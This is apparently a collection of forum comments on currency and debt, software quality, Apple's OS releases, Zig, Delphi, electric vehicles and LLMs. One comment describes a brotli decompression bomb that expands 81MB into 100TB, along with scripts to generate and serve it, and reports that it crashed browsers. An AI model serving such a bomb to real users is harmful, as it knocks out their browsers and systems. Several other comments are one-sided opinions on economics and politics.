Using a national currency as the de facto global reserve guarantees a trade deficit for that country.
No one else can manufacture USD's, so other countries have to acquire them by shaping their economies to supply goods and services demanded by the US. They can then use these earned dollars to transact with other countries, as the US itself insists they do.
For the US, this is a simple trade off - gain massive political influence (and market intelligence - all USD transactions go through US institutions regardless of where those transacting partners are located), at the expense of hollowing out domestic industry and running a deficit in physical goods traded.
The solution is a non-national global reserve, calculated on a basket of national currencies. This was Keynes argument at Bretton Woods, but the US would not have it then, and does not want it now.
For context, "worse is better" refers to Gabriel's observation that products with simple implementations and complicated interfaces tend to achieve adoption faster than products with complex implementations and elegant interfaces.
One of the original motivating examples were Unix-like systems (simple implementation, few correctness guarantees in interfaces) vs. Lisp-based systems (often well specified interfaces, but with complicated implementations as the cost.)
If you aren't hiring junior engineers to do these kinds of things, where do you think the senior engineers you need in the future will come from?
My kid recently graduated from a very good school with a degree in computer science and what she's told me about the job market is scary. It seems that, relatively speaking, there's a lot of postings for senior engineers and very little for new grads.
My employer has hired recently and the flood of resumes after posting for a relatively low level position was nuts. There was just no hope of giving each candidate a fair chance and that really sucks.
My kid's classmates who did find work did it mostly through personal connections.
People forget that every transaction has two parties. Someone's debt is another's asset. The national debt is mostly owned by Americans. That means the national debt is an asset to the private sector. This is the way all money works because money IS debt.
The real crisis is high debt loads in the private sector, not the government. Why? Because the government owns the currency it's debts are denominated in. There is zero risk the government couldn't pay it's dollar debts if there is still a US government. The only reason to downgrade is if there is a real risk the US government will collapse and cease to exist for political reasons. There is no fiscal risk.
The deficit hawks don't understand how money works. The real concern is private debts, not government debts. But you never hear about that in the media.
I was involved in an M&A once; my role was to evaluate the technology and determine how long it would take us to build a competitive product. If it was less than some X then we’d build it, greater than X and we’d buy. The function for X was not clear to me from my perspective; it had legal fees involved, etc.
The person leading M&A said an intangible aspect of the price is what it does to the adjacent market. If the leading product A is valued during a raise at $Y, and you buy the next best product B at 1/10 that, you cause future issues with raises for A.
As an American, I’m doing what I can to boycott stuff made in red states. I can and do pay up to 2x more for blue state stuff (which is typically higher quality, to be honest), and go imported otherwise.
"In 2013 i met a very close friend of Steve Jobs and i remember saying "there's one thing i absolutely have to know, it's really important to me" he responds "okay what is it?"
I ask "what was all the money for?!" puzzled "what do you mean?" "Steve Jobs saved up like 200 billion dollars in cash at Apple, but what was it all for? what was the plan? was he going to buy AT&T? was he going to build his own telecom or make a giant spaceship? what was it for?"
And he looked at me with just the deepest and saddest eyes and spoke softly "there was no plan" "what??" "you see, Steve's previous company, NeXT, it ran out of money, so at with Apple he always wanted a pile of money on the side, just in case. and over years, the pile grew and grew and grew... and there was no plan..."
> > Codecs. VP8/9 and AV1 broke the mpeg alliance monopoly and made non patented state of the art video compression possible.
> Could agree. Not sure of Google's real contribution to those.
They were not the only contributor (I was the technical lead for Mozilla's efforts in this space), but they were by far the largest contributor, in both dollars and engineering hours.
I think you should appreciate more how much the tens of billions of dollars Google has invested in Chrome has benefited the web and open source in general. Some examples:
Webrtc. Google’s implementation is super widely used in all sorts of communications software.
V8. Lots of innovation on the interpreter and JIT has made JS pretty fast and is reused in lots of other software like nodejs, electron etc.
Sandboxing. Chrome did a lot of new things here like site isolation and Firefox took a while to catch up.
Codecs. VP8/9 and AV1 broke the mpeg alliance monopoly and made non patented state of the art video compression possible.
SPDY/QUIC. Thanks to Google we have zero RTT TLS handshakes and no head of line blocking HTTP with header compression, etc now and H3 has mandatory encryption.
Here's a brotli file I created that's 81MB compressed and 100TB uncomrpessed[1] (bomb.br). That's a 1.2M:1 compression ratio (higher than any other brotli ratio I see mentioned online).
There's also a script in that directory that allows you to create files of whatever size you want (hovering around that same compression ratio). You can even use it to embed secret messages in the brotli (compressed or uncompressed). There's also a python script there that will serve it with the right header. Note that for Firefox it needs to be hosted on https, because Firefox only supports brotli over https.
Back when I created it, it would crash the entire browser of ESR Firefox, crash the tab of Chrome, and would lead to a perpetually loading page in regular Firefox.
The US is falling way behind in electric vehicles. If BYD could sell in the US, the US auto industry would be crushed.[1]
What went wrong is that 1) Tesla never made a low-end vehicle, despite announcements, and 2) all the other US manufacturers treated electric as a premium product, resulting in the overpowered electric Hummer 2 and F-150 pickups with high price tags. The only US electric vehicle with comparable prices in electric and gasoline versions is the Ford Transit.
BYD says that their strategy for now is to dominate in every country that does not have its own auto industry. Worry about the left-behind countries later.
BYD did it by 1) getting lithium-iron batteries to be cheaper, safer, and faster-charging, although heavier than lithium-ion, 2) integrating rear wheels, differential, axle, and motor into an "e-axle" unit that's the entire mechanical part of the power train, and 3) building really big auto plants in China.
Next step is to get solid state batteries into volume production, and build a new factory bigger than San Francisco.
I think that Zig's simplicity hides how revolutionary it is, both in design and in potential. It reminded me of my impression of Scheme when I first learned it over twenty years ago. You can learn the language in a day, but it takes a while to realize how exceptionally powerful it is. But it's not just its radical design that's interesting from an academic perspective; I also think that its practical goals align with mine. My primary programming language these days is C++, and Zig is the first low-level language that attempts to address all of the three main problems I see with it: language complexity, compilation speed, and safety.
In particular, it has two truly remarkable features that no other well-known low-level language -- C, C++, Ada, and Rust -- have or can ever have: lack of macros and lack of generics (and the associated concepts/typeclasses) [1]. These are very important features because they have a big impact on language complexity. Despite these features, Zig can do virtually everything those languages do with macros [2] and/or generics (including concepts/typeclasses), and with the same level of compile-time type safety and performance: their uses become natural applications of Zig's "superfeature" -- comptime.
Other languages -- like Nim, D, C++ and Rust also have a feature similar to Zig's comptime or are gradually getting there -- but what Zig noticed was that this simple feature makes several other complex and/or potentially harmful features redundant. Antoine de Saint-Exupery said that "perfection is achieved, not when there is nothing more to add, but when there is nothing left to take away." I think that Zig, like Scheme -- and yes, there are others -- is close to that minimalist vision of perfection.
What a truly inspiring language. Rather than asking how we could make C++'s general philosophy work better as another increasingly famous language does, IMO, it asks how we could reshape low-level programming in a way that's a more radical break with the past. I think it's a better question to ask. Now all there's left to hope for is that Zig gets to 1.0 and gains some traction. I, for one, would love to find a suitable alternative to C++, and I believe Zig is the first language that could achieve that in a way that suits my particular taste.
[1]: I guess C has the second feature, but it loses both expressivity and performance because of it.
[2]: Without the less desirable things people can do with macros.
China, based on demographics alone, will never be a demand based consumption economy. The only reason so much stuff is still made in China is the sunk cost to build an industrial complex.
In the end, it really doesn't matter what the issues with China are. There are an endless number of points that if you bother to look into it the chinese are not peers of the US. However, the US, need an external boogeyman who appears competent to make politics work.
No it isn't 'capital flight' Noah - that's a fixed exchange rate concept. There are no fewer dollars in the US dollar currency area after the sale than before.
Specifically "Normally, when Treasuries get sold off, people park their money in cash, instead of moving it overseas. This time, a bunch of investors actually pulled their money out of America entirely."
They didn't, because to get out you require a bunch of other investors putting their money into America, otherwise there would be no exchange in the first place.
It's a fallacy of composition. Individual investors can sell their dollars and buy euros, but investors overall cannot. Somebody has to be selling euros and buying dollars, and the question has to be asked "what did they do with those dollars when they got them, and why were they coming in that direction in the first place?".
Liquidating static savings and pushing them back into the flow tends to cause more physical transactions to occur. It's taking money out of a drawer and spending it. That's likely stimulative.
Old school web tech is the best. I still reach for multipart/form-data every day. Many of my web applications do not even have javascript.
I hope at some point the original pattern is re-discovered and made popular again because it would make things so much snappier:
1. Initial GET request from user's browser against index and maybe favicon.
2. Server provides static/dynamic HTML document w/ optional JS, all based upon any session state. In rare cases, JS is required for functionality (camera, microphone, etc.), but usually is just to enhance the UX around the document.
3. User clicks something. This POSTs the form to the server. The server takes the form elements, handles the request, and then as part of the same context returns the updated state as a new HTML document in the POST response body.
4. That's it. The web browser, if it is standards compliant, will then render the resulting response as the current document and the process repeats.
All of this can happen in a single round trip. Latency is NOT a viable argument against using form submissions. I don't think suffering window navigation events is a valid one either. At some point, that SPA will need to talk to the mothership. The longer it's been disconnected, the more likely it's gonna have a bad time.
The web only has to be hard if you want to make it hard. Arguments against this approach always sound resume-driven more than customer-driven. I bet you would find some incredibly shocking statistics regarding the % of developers who are currently even aware of this path.
The first is that LLMs are bar none the absolute best natural language processing and producing systems we’ve ever made. They are absolutely fantastic at taking unstructured user inputs and producing natural-looking (if slightly stilted) output. The problem is that they’re not nearly as good at almost anything else we’ve ever needed a computer to do as other systems we’ve built to do those things. We invented a linguist and mistook it for an engineer.
The second is that there’s a maxim in media studies which is almost universally applicable, which is that the first use of a new media is to recapitulate the old. The first TV was radio shows, the first websites looked like print (I work in synthetic biology, and we’re in the “recapitulating industrial chemistry” phase). It’s only once people become familiar with the new medium (and, really, when you have “natives” to that medium) that we really become aware of what the new medium can do and start creating new things. It strikes me we’re in that recapitulating phase with the LLMs - I don’t think we actually know what these things are good for, so we’re just putting them everywhere and redoing stuff we already know how to do with them, and the results are pretty lackluster. It’s obvious there’s a “there” there with LLMs (in a way there wasn’t with, say, Web 3.0, or “the metaverse,” or some of the other weird fads recently), but we don’t really know how to actually wield these tools yet, and I can’t imagine the appropriate use of them will be chatbots when we do figure it out.
The March 8, 2025 and March 15, 2025 issues focus on how the rest of the world is responding to the repositioning of the US government and increased supply chain disruption. Those two issues are worth reading if supply chains, imports, or exports impact anything you're involved with.
The ASML article is hinting that Europe should fab more of its own ICs. Most of ASML's equipment is exported, not used within Europe. It's not that ASML wants to leave Europe. It's that they need more European customers.
Other articles in those two issues cover how Europe is starting to respond to American isolationism and Russian aggression. US threats to pull out of NATO are taken seriously, and contingency plans for a post-US NATO are underway. It looks like France will provide the nuclear deterrent. France's nuclear weapons program is not dependent on the US, but the UK's is. Further acquisition of US fighter aircraft is now much less likely. There's a concern that the F-35 is too "cloud enabled" and dependent on US data sources. The Swedish Gripen is looking like a better option. Efforts to replace US satellite dependency are underway, with recent launches on Ariane boosters from French Guiana. Reduction of EU dependence on the US internet is progressing. All the countries with borders facing Russia or Ukraine have upped military spending considerably. There's debate from the countries further from the front line on how much they have to.
Decades-old alliances and trade patterns are shifting. Europe has less of a problem with China than the US does. Russia is much closer, has caused trouble for a century, and there's a lot of bad history there. The US has a long history with Japan, South Korea, and Taiwan, but Europe does not. Nor does Europe have any obligations to Israel, which helps when getting along with the Arab world.
Read more non-US sources on what's happening. Huge, slow changes are underway.
I did not do many things in Delphi but I have studied the language and VCL architecture for the very purpose of determining why it is so aproachable and productive (as compared to C, Java, JS, Python and the tooling around them).
In my opinion, it is the result of following qualities:
1. The language direcly supports concepts needed for live WYSIWYG editing (i.e. properties and events) while other languages only simulate it by convention (i.e. Java Bean specification)
2. The language syntax is simple enough for the IDE to understand and modify programatically, but powerful. The properties files that define the forms are even simpler, support crucial features (i.e. references and hierarchy) but do not bring unecessary complexity as general-purpose formats do (XML files or JSON)
3. Batteries included - you can do very powerful stuff with the included components (gui, i/o, ipc, sql, tcp/ip, graphics - all the practical stuff) without hunting for libraries
4. Discoverability - the visual component paradigm with Property editor lets you see all your possibilities without reading the documentation.
5. Extensibility - you can build your own components that fully integrate with the IDE. This is my litmus test for low-code and RAD tools: For any built-in feature, can I recreate the same using the provided tools? Many tools fail this, and the built-in components can do things that are inaccessible to user-defined components.
6. Speed - both compilation and runtime, thanks to one-pass compilation and native code. Leads to fast iteration times.
7. The VCL component architecture is a piece of art. The base classes implement all the common functionality: They automatically manage memory, can store and load persistent state, have properties for visual placement (position, size) etc. The language features really help here (I remebmer something about interface delegation) but there is no magical runtime that does this from the outside, it's an actual implementation of the component that can be extended or overriden.
But of couse there are the ugly things as well: alien syntax, forward declarations, strict compiler blocking the Form Designer on any error preventing you to fix the very error and most of all: while there is very good abstraction for the components, there is none for data and state. There is no good tooling for data modelling and working with the data models. That leads to poor practices as having state in the visual components or in global variables.
I keep being tempted to write same post but named "Does all software work like shit now?", because I swear, this is not just Apple. Software in general feels more bugged as a new norm.
Most websites have an element that won't load on the first try, or a button that sometimes needs to be clicked twice because the first click did nothing.
Amazon shopping app needs two clicks every now and then, because the first one didn't do what it was supposed to do. Since 3+ years ago at least.
Spotify randomly stops syncing play status with its TV app. Been true for at least a year.
HBO app has subtitles for one of my shows out of sync and it has been for more than a year.
Games including AAA titles need few months post-release fixing before they stabilize and stop having things jerk themselves into the sky or something.
My robot vacuum app just hangs up forever once in a while and needs to be killed to work again, takes 10+ seconds after start to begin responding to taps, and it has been like that for over 2 years of owning the device.
Safari has had a bug when opening a new tab and typing "search term" too quickly, it opens URL http://search%20term instead of doing a Google search. 8 years ago I've opened a bug for that which was closed as a duplicate, and just recently experienced this bug again.
It really seems that criteria for "ready for production" is way lower now. If my first job 13+ years ago any QA noticed any of that above, the next version wouldn't be out until it is fixed. Today, if "Refresh" button or restarting the app fixes it, approved, green light, release it.
As a former Apple employee that left in part due to declining software quality (back in 2015!), and the relentless focus on big flashy features for the next yearly release cycle, I could not agree more.
I recently had to do a full reinstall of macOS on my Mac Studio due to some intermittent networking issue that, for the life of me, I could not pin down. Post-reinstall, everything's fine.
Mid-tier engineers are the most dangerous type of engineer as they've learned enough to make decent abstractions and they tend to run with that over-engineering everything they touch.
IMO it is better said that Go is designed as being a good language for Senior and Junior developers, where mid-tiers will probably hate it.
As the person who personally ran 10.6 v1.1 at Apple (and 10.5.8), you are wrong(ish).
The new version of the OS was always being developed in a branch/train, and fixes were backported to the current version as they were found. They weren't developed linearly / one after another. So yeah, if you are comparing the most stable polished/fixed/stagnant last major version with the brand new 1.0 major version branch, the newer major is going to be buggier. That would be the case with every y.0 vs x.8. But if you are comparing major OS versions, Snow Leopard was different.
Snow Leopard's stated goal internally was reducing bugs and increasing quality. If you wanted to ship a feature you had to get explicit approval. In feature releases it was bottom up "here is what we are planning to ship" and in Snow Leopard it was top down "can we ship this?".
AFAIK Snow Leopard was the first release of this kind (the first release I worked on was Jaguar or Puma), and was a direct response to taking 8 software updates to stabilize 10.5 and the severity of the bugs found during that cycle and the resulting bad press. Leopard was a HUGE feature release and with it came tons of (bad) bugs.
The Apple v1.1 software updates always fixed critical bugs, because:
1. You had to GM / freeze the software to physically create the CDs/DVDs around a month before the release. Bugs found after this process required a repress (can't remember the phrase we used), which cost money and time and scrambled effort at the last minute and added risk. This means the bar was super high, and most "bad, but not can't use your computer bad" bugs were put in v1.1...which was developed concurrently with the end of v1.0 (hence why v1.1s came out right away)
2. Testing was basically engineers, internal QA, some strategic partners like Adobe and MS, and the Apple Seed program (which was tiny). There was very little automated testing. Apple employees are not representative of the population and QA coverage is never very complete. And we sometimes held back features from seed releases when we were worried about leaks, so it wasn't even the complete OS that was being tested.
A v1.1 was always needed, though the issues they fixed became less severe over time due to larger seeds (aka betas), recovery partitions, and better / more modern development practices.
Probably an agreeability thing? The iconoclasts who get things done tend to be disagreeable, but success at a reality scale is different than success in a large company.
You get promoted and go up because of your peer coworker group's support, which creates a strong incentive to not rock the boat and go against sacred cows that work well enough. The person who succeeds in big company post a hypergrowth phase is a very different person than one who made the hypergrowth happen.
They did this during the period where Chrome was eating into Firefox usage, after telling Mozilla that they would drop H.264 in favor of open codecs but never keeping that promise. Here’s some period discussion:
What this meant in practice was that Firefox would play YouTube videos at close to 100% CPU and Chrome would use H.264 and play at like 5% CPU, and since it was VP8 the quality was noticeably worse than H.264 as well. Regular people talked about that a lot, and it helped establish Chrome’s reputation for being faster.
Could you explain what you mean with "8-wide decode in many places" ? How is that possible, isn't instruction coding kinda always the same? I.e. always 4-wide or always 8-wide, but not sometimes this and sometimes that.
All sources I could find say it is 4-wide, so I'd also be interested if you could perhaps give a link to a source?
That's my overall point of view too. Regardless of infinite technical discussions about one or another, if Alice and Bob can't live together than just don't get married.
Why spend all this energy on conflict and drama to no end? If one language/technology/group is so much better then just fork the thing and follow their own path.
I'm actually not defending the C guys, I just want to leave them alone and let "Nature" take his course, if they die on obsolescence, then they die. who cares..
Doesn't that make software engineers one of the few employees with much worse tax treatment?